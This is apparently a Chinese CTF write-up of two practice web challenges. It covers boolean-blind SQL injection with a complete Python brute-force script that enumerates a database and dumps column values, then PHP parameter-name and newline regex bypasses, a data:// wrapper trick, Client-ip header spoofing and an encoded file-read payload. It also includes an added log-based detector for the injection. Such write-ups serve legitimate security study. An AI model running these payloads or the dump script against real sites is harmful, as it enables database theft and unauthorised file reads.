[WUSTCTF2020] 颜值成绩查询 (score lookup)
Initial information
The page has a single query box. The URLs behind it return the following:
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=1
return: Hi admin, your score is: 100
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=-1
return:student number not exists.
Scanning turns up nothing else.
Solution
A plain SQL injection through the ID does not work, because the value is checked as a number.
So what does this statement turn into once it is executed inside the database?
Try querying with the SQL database's if statement:
Boolean-based injection, helped along by if(a,b,c):
if a is true, it returns b
if a is false, it returns c
With that basic understanding of if, try accessing the page with these statements:
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1>0),1,-1)
return: Hi admin, your score is: 100
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1<0),1,-1)
return:student number not exists.
Since the two boolean states return two strings with distinctive features, boolean-based blind injection can be attempted:
```
# Using the statement below as the base, only one place needs to be replaced:
# the braces mark the content we substitute
## Part one:
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum={}
## Part two: this is the statement we modify, i.e. the injected statement
## {0} is the injected expression, {1} the start position of the substring, {2} the decimal ASCII value of the character
## Only {0} needs to be filled in here. {1} and {2} are used later by the brute force and are left out for now
## ord: converts the character to its decimal ASCII code
## substring(x,1,1): takes 1 character of string x starting at position 1
if((ord(substring({0},{1},1))={2}),1,-1)
```
Before writing the boolean injection, a quick word on the SQL injection workflow:
SQL injection roughly proceeds as: enumerate database => enumerate tables => enumerate columns => dump column values
Personally, I am used to fetching the whole content of a column and dumping it directly.
Boolean injection with the following expressions inserted at the {0} position:
```
# enumerate the database
{0} = (database())
## merged into one complete statement (assuming we are currently brute-forcing the second character of the database name):
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum=if((ord(substring((database()),2,1))=97),1,-1)
## looking closely at this one shows what the final result of the construction looks like
## below, only the value inserted at {0} is shown
# the query reveals the database name: ctf
# enumerate tables
{0} = (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
# table names found: 'flag,score'
# enumerate columns (two tables, each enumerated separately)
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="score"))
# results: ['flag,value', 'id,name,score']
# dump values (here only the value column of the flag table)
{0} = (select(group_concat(value))from(ctf.flag))
# what this returns is the flag itself.
```
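From the defender's side, the oracle template above has a clear signature in access logs: a legitimate request carries an integer in stunum, while the brute force sends one request per candidate character, each with a SQL expression in the parameter. The detector below is an added example, not part of the original post; it assumes common-log-format lines (the sample lines are constructed, not from the challenge) and flags non-integer stunum values per client.

```python
"""Flag boolean-blind probing of the stunum parameter in web access logs."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (common log format), not taken from the challenge.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?stunum=-1 HTTP/1.1" 200 480
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?stunum=if((1>0),1,-1) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?stunum=if((ord(substring((database()),1,1))=97),1,-1) HTTP/1.1" 200 480
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?stunum=if((ord(substring((database()),1,1))=98),1,-1) HTTP/1.1" 200 480
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?stunum=if%28%28ord%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D99%29%2C1%2C-1%29 HTTP/1.1" 200 512
"""

# ip, method, request target and status of one common-log-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_RE = re.compile(r'^-?\d+$')
# function names that appear in the oracle template discussed in the post
SQL_FUNCS = re.compile(r'\b(if|ord|ascii|substring|substr|select|database)\s*\(', re.I)


def classify_stunum(value):
    """Return 'numeric', 'sql' or 'other' for one (already URL-decoded) stunum value."""
    v = value.strip()
    if INT_RE.match(v):
        return 'numeric'
    if SQL_FUNCS.search(v):
        return 'sql'
    return 'other'


def scan_log(text):
    """Return ([(ip, stunum value, verdict), ...], Counter of non-numeric probes per ip)."""
    hits = []
    per_ip = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes, so encoded payloads are normalised before matching
        params = parse_qs(urlsplit(m['target']).query, keep_blank_values=True)
        for val in params.get('stunum', []):
            verdict = classify_stunum(val)
            if verdict != 'numeric':
                hits.append((m['ip'], val, verdict))
                per_ip[m['ip']] += 1
    return hits, per_ip


if __name__ == '__main__':
    found, counts = scan_log(SAMPLE_LOG)
    for ip, val, verdict in found:
        print(ip, verdict, val)
    print(counts)
```

A burst of many 'sql' verdicts from one client, alternating between the two response sizes, is the brute force in progress; the durable fix is to bind stunum as an integer parameter server-side rather than interpolate it.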
To make the brute force easier I wrote a helper script. It is not multithreaded, so it is rather slow...
```python
# coding=utf8
import requests, time
# tqdm: progress-bar library
from tqdm import tqdm


## test boolean-based injection
def bool_cs_request(url, get_vals):
    urls = url + '?' + get_vals

    def get_status(value):
        """
        Judges the content of the response to an attack request
        :param value: the HTTP response object
        :return: boolean detection state
        """
        return ("student number not exists" not in value.text
                and "Hi admin, your score is: 100" in value.text)

    def get_val(value, urls):
        """
        Boolean brute-forcer
        :param value: SQL expression to brute-force
        :param urls: URL template to send requests to
        :return: the recovered string
        Only drawback: too slow, no multithreaded attack
        """
        data = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
        }
        name_val = ''
        all_sql = 'if((ord(substring({0},{1},1))={2}),1,-1)'
        for i in range(1, 100000):
            lin_val = name_val
            for ascii_one in tqdm(charset, desc='单字符攻击进度', unit='个'):
                val = requests.get(urls.format(all_sql.format(value, i, ascii_one)), headers=data)
                time.sleep(0.1)
                if get_status(val):
                    name_val += chr(ascii_one)
                    print()
                    print(name_val)
                    break
            # no character matched at position i: the string is complete
            if lin_val == name_val:
                break
        return name_val

    # build the ASCII table
    # the table order is tuned so that likely characters are tried first, which speeds up the scan
    def n_to_l(num_start, num_end):
        return list(range(num_start, num_end))

    l = (n_to_l(97, 123) + n_to_l(65, 91) + n_to_l(48, 58)
         + [95, 123, 125, 44, 45, 46] + n_to_l(32, 43)[::-1])
    ls = [i for i in range(32, 127) if i not in l]
    charset = l + ls[::-1]

    # enumerate the database name
    database_sql = 'database()'
    database_name = get_val(database_sql, urls)
    # print('数据库名:' + database_name)
    # enumerate tables
    table_sql = "(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))"
    table_name = get_val(table_sql, urls)
    # split the table names into a list (a single table gives a one-element list)
    table_list = table_name.split(',') if table_name else []
    # enumerate columns/fields
    ## store the columns of each table
    l_list = []
    for name in table_list:
        l_sql = '(select(group_concat(column_name))from(information_schema.columns)where(table_name="{}"))'.format(name)
        l_list.append(get_val(l_sql, urls))
    ## split the column list of each table
    all_field = [i.split(',') for i in l_list]
    # dump values
    find_num = 0
    field_num = 0
    try:
        print('库名:', database_name)
        print('只能输入数字,不能输入其它。')
        print('表名:', table_list)
        print('字段:', all_field)
        control_table = input('请输入要控制的查那些表(注意!只能选择一张表进行查询!):').strip()
        control_field = input('请输入要控制的表对应的字段有那些(以0为初始值选择表对应的字段,一次性只能选择一个字段):').strip()
        find_num += int(control_table)
        field_num += int(control_field)
    except ValueError:
        find_num = 0
        field_num = 0
        print('你的输入有误!默认只查询第一张表!')
    # query only the selected table and field, so nothing gets dumped wholesale
    if 0 <= find_num < len(table_list):
        if 0 <= field_num < len(all_field[find_num]):
            # build the SQL expression
            field_val = '(select(group_concat({}))from({}.{}))'.format(
                all_field[find_num][field_num], database_name, table_list[find_num])
            print(get_val(field_val, urls))
        else:
            print('你正在查询一个不存在的字段……')
    else:
        print('你正在查询一个不存在的表……')


if __name__ == '__main__':
    # url = 'http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/'
    url = input('请输入你的URL(形如http://xxx.xxx.com:81/):')
    get_parameters = 'stunum={}'
    bool_cs_request(url, get_parameters)
```
If you use the script, remember to install the packages it imports.
To make the process a bit more fun, a progress bar was added `(∩_∩)′
A heads-up on runtime: it will exceed the 1 h limit of the practice instance, so be prepared to extend the time.
Summary
- SQL injection: boolean-based blind injection
- MySQL's if statement
- Python script
[MRCTF2020] 套娃 (matryoshka)
Initial information
Very little, but the page source contains a hint
```html
<!--
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
!-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hello BUPTers</title>
</head>
<body>
<h1>Welcome!</h1>
<span>这只不过是个小测试区,啥都没有,还请各位多多包涵!</span>
<span>made by crispr</span>
<br></br>
<br></br>
<div>
<img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1583738587360&di=ba2d04cc2ba8603ccaab3d9673976d76&imgtype=0&src=http%3A%2F%2Fimgsrc.baidu.com%2Fforum%2Fw%3D580%2Fsign%3D64c278455f6034a829e2b889fb1249d9%2F46c3bf12c8fcc3ce3e1a38779145d688d63f20eb.jpg" style="width:1500px;height:500px;">
</div>
</body>
</html>
```
Solution
Layer one
Extract the source code and analyse it:
```php
$query = $_SERVER['QUERY_STRING'];
# PHP quirk: certain characters in a parameter name are converted to an underscore
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
# preg_match('/^23333$/') is a regex anchored at both ends; bypass it with a newline
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
```
After working around the underscore restriction on the parameter name, just pass the parameter directly:
get: ?b u p t=23333%0a
<!--
%0a is a newline
the spaces in "b u p t" make the variable name received on the server side become b_u_p_t
after passing the parameter we get:
-->
return: FLAG is in secrettw.php
On PHP's parameter-name parsing mechanism, see the linked article; it seems the parsing gets stricter in newer PHP versions.
Layer two
Jumping to secrettw.php returns the following:
Flag is here~But how to get it?Local access only!
Sorry,you don't have permission! Your ip is :sorry,this way is banned!
"Local access only" means we will have to brute-force a local-IP header.
Going through the challenge page's source once more, there is still one more piece of information: a long JavaScript blob built only from the characters ()+[]!
Originally a dedicated tool would be needed to decode it, but later I learned that simply printing it with console.log in JS is enough.
Of course, the JSFuck website can also decode it.
Decoding it pops up the following text:
post me Merak
So send a POST parameter named Merak:
post: Merak=me
This returns the source code.
Layer three: source analysis
```php
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
    highlight_file(__FILE__);
    die();
}
# decoding function
function change($v){
    # base64-decode
    $v = base64_decode($v);
    $re = '';
    # take each character's decimal code and add the increment $i*2, in order
    for($i=0;$i<strlen($v);$i++){
        $re .= chr ( ord ($v[$i]) + $i*2 );
    }
    return $re;
}
echo 'Local access only!'."<br/>";
# the IP-resolving function comes from the included external PHP file
$ip = getIp();
if($ip!='127.0.0.1')
    echo "Sorry,you don't have permission! Your ip is :".$ip;
# check whether the IP is right, then check a condition through file_get_contents?
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
    echo "Your REQUEST is:".change($_GET['file']);
    # the actual file content read
    echo file_get_contents(change($_GET['file'])); }
?>
```
One thing has to be mentioned here: the '2333' GET parameter that the first file_get_contents call receives.
```
file_get_contents($_GET['2333']) === 'todat is a happy day' )
# meaning: check whether the file contents are exactly "todat is a happy day"
# the wrapper that lets you pass file contents directly is data:
?2333=data:text/plain,todat is a happy day
```
That takes care of one parameter.
The other one is the IP address brute force.
```
# Just run it through Burp's Intruder.
# The brute force yields this HTTP request header
Client-ip : 127.0.0.1
```
That leaves the GET parameter used to read the file.
The function above transforms the GET parameter before using it, so its inverse has to be written first:
```php
function unchange($v){
    $re = '';
    for($i=0;$i<strlen($v);$i++){
        $re .= chr(ord($v[$i])-$i*2);
    }
    return base64_encode($re);
}
```
Call this function on the file we want to read to encode its name:
```php
var_dump(unchange('index.php'));
# gives: string(12) "aWxgX3AkZFpg"
var_dump(unchange('flag.php'));
# gives: string(12) "ZmpdYSZmXGI="
```
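The same transformation pair in Python, as an added example that is not part of the original post: it mirrors the challenge's change() and the inverse unchange() above, reproduces the two encoded values listed, and checks the round trip. Like PHP's chr(), the byte arithmetic wraps modulo 256.

```python
import base64


def change(v: str) -> str:
    """Mirror of the challenge's PHP change(): base64-decode v, then add 2*i to byte i."""
    raw = base64.b64decode(v)
    # PHP's chr() wraps modulo 256, so the same is done here
    shifted = bytes((b + 2 * i) % 256 for i, b in enumerate(raw))
    return shifted.decode('latin-1')


def unchange(path: str) -> str:
    """Inverse of change(): subtract 2*i from byte i, then base64-encode the result."""
    raw = path.encode('latin-1')
    shifted = bytes((b - 2 * i) % 256 for i, b in enumerate(raw))
    return base64.b64encode(shifted).decode('ascii')


if __name__ == '__main__':
    for name in ('index.php', 'flag.php'):
        enc = unchange(name)
        print(name, '->', enc, '->', change(enc))
```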
Read the flag first; the complete payload is:
GET:?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
header: Client-ip : 127.0.0.1
return: # source dug out of the HTML comment
```php
<?php
$flag = 'flag{5843a57f-3446-425c-9a56-d3e1e1fabb51}';
echo "Flag is here~But how to get it?";
?>
```
Summary
```
file_get_contents()
# what is exploited:
/*
stream wrappers:
data://text/plain,.....
data://text/plain;base64,....
*/
header
# brute-forcing the local-IP header field of the request
PHP parameter-name parsing
# b u p t=23333%0a
# https://www.freebuf.com/articles/web/213359.html
%0a newline bypass
# preg_match with an anchored regex of the form /^23333$/ ==> /^....$/
JSFuck: decoding JS written only with ()+[]!
# print the result of this encoding with console.log
# the browser console directly outputs the execution result of the ()+[]! encoding
# run it online: https://jsfuck.com/
```